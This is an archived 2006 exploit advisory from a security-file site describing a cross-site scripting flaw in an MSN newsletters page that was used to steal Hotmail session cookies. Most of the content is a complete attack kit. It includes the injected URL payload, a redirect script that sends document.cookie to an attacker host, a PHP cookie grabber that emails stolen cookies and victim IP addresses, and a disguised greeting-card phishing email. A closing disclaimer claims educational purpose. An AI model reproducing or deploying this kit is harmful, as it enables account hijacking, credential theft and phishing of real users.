exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hotmailmsnxss.txt

hotmailmsnxss.txt
Posted Aug 27, 2006
Authored by Simo64 | Site morx.org

Hotmail/MSN suffers from a cross site scripting flaw.

tags | exploit, xss
SHA-256 | eaf58befb3afdae98608b527db273927c909566c2b27744e053c32a41c4f9af1

hotmailmsnxss.txt

Change Mirror Download
Hotmail/MSN Cross Site Scripting Exploit

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all
browsers)

Morx Security Research Team
https://www.morx.org

Description:

Exploit written in PHP to exploit the 'RE' variable in
newsletters.msn.com/xs-v3/insite.asp
cross site scripting vulnerability inside MSN.com website. Exploit
requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering
skills are required too


Exploitation:


Exploiting this vulnerability can be done by uploading the following
script to a php enabled
webserver then send an email to the victim with
https://https://www.attacker-server.com/ecard.php
the link of the script that redirect to vulnerable msn site , so as an
example the email can be
sent as a greeting card with the following
HTML code, you may also need to modify some things on the ecard.php
exploit to make it fit your needs.

Hello, </p>
Alias has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="https://attacker-site/ecard.php"> https://
lycos.americangreetings.com/view.pd?i=197484541&m=8381&rr=y&source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com




------------------------ Hotmail/MSN accounts XSS Xploit by Simo64
---------------------- */

Exploit :

https://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script
src=https://attacker/redir.js>

WHERE redir.js code is :

location.href='https://attacker-site/a.php?cookie='+escape(document.cookie)

and a.php as cookie grabber may use the following code:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location:
https://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");
?>


ecrad.php page may contain a simple php or javascript rediretion to
exploit link :)


Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing
this information is entirely on your OWN risk. The information provided in
this advisory is to be used/tested on your
OWN machine/Account. I cannot be held responsible for any of the above.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close